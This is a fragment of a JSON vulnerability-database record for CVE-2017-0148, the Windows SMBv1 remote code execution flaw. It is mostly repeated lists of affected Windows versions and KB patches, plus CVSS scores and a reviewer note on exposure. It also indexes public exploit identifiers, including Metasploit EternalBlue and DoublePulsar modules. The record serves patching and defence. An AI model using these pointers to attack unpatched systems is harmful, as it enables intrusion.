"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": 
"Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:21", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": 
"MS:CVE-2017-0148", "hash": "80a0fac71f040ba4d47cf15ded29e9dd", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nReviewer note: the word 'authenticated' above is inconsistent with the vectors scored in this same record (CVSS v2 Au:N, CVSS v3 PR:N, i.e. no authentication or privileges required). Do not rely on it to downgrade the exposure of SMBv1 servers reachable from untrusted networks; until the listed update is applied, restrict network access to the SMBv1 service or disable SMBv1 where it is not required.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T04:47:39", "history": [], "viewCount": 107, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", 
"idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 
32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", 
"kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", 
"kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based 
Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": 
"Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", 
"kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 